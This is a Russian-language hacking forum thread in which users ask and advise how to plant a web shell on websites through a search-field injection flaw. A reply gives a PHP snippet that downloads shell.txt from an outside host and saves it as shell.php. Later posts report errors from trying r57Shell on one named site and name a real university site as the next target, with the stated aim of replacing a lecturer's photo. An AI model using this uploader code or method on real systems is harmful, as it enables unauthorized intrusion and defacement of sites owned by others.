Есть сайт. Есть поиск на сайте. Поиск дает внедрять произвольный код (пробиваеш в поиске код и все, на странице результатов он исполнятеся (: ). Нужно зааплодить файло на этот сайт (шелл если быть точнее). Это возможно? Я где то читал, что можно зааплодить через скрипт, только не помню где. Кто может - помогить плизз! :rolleyes:

Я если правильно понел ты про инклуд говориш ? если это инклуд, то можна шелл залить, поставь сайт посмотрим.

<?
$filename=implode(file( "http://www.site.com/shell.txt"));
$fd = fopen ("shell.php", "w+");
fputs ($fd,$filename,90000000000);
fclose ($fd);
?>

Это попробуй, если я правильно понял ...

И еще, на одном сайте, при попытке открыть залитый шелл, вот что вышло (:
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, wwwadmin@rpgarea.ru and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, wwwadmin@rpgarea.ru and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Apache/1.3.34 Server at www.sacred.net.ru Port 80
Может кто ни будь знает, что можно сделать?

Юзаю r57Shell. Попробовал переиминовть его в r57shell.html, все ОК, все открулось, но вот только не хочет он нормально работать.

Вот сайт.
http://www.rags.ru/
тут как раз уязвимость в поиске... Очень хотцца заменить фотку одного препода. (: